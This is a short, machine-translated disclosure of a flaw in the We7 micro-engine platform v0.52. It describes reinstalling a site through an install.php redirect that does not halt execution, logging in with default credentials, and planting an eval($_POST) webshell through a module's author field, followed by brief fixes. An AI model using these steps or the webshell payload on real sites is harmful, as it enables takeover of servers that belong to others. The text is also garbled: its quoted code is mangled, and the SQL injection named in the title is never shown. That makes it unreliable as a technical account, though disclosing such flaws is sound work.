Micro-engine-public platform self-help engine system full-site reinstallation + SQL Injection getshell
Http://www.we7.cc/download the source code, the volume is quite large. Verify that the vulnerability is v0.52.
Http://bbs.we7.cc/forum.php? Mod = viewthread & tid = 1155 in the/install. php file 26 ~ The 28 lines of code are as follows:
If (file_exists (IA_ROOT. '/data/install. lock') & $ action! = 'Finish ') {header ('location:./index. php ');}
If the conditions are met, the system jumps to index. php, but the header does not prevent the program from continuing to execute. By constructing a post package, you can reinstall the entire site. Http: // 127.0.0.1/weixin/member. php? Act = login & admin/111111, add a new module in global Settings> module Management> module design and enter a trojan in the author's box */eval ($ _ POST [chopper]);/*, generate the module template webshell address: http: // 127.0.0.1/weixin/source/modules/test/module. php
Solution:1. After the installation is complete, the install. php file is automatically deleted, or jumps out after the conditions are met. 2. The SQL injection field is correctly filtered.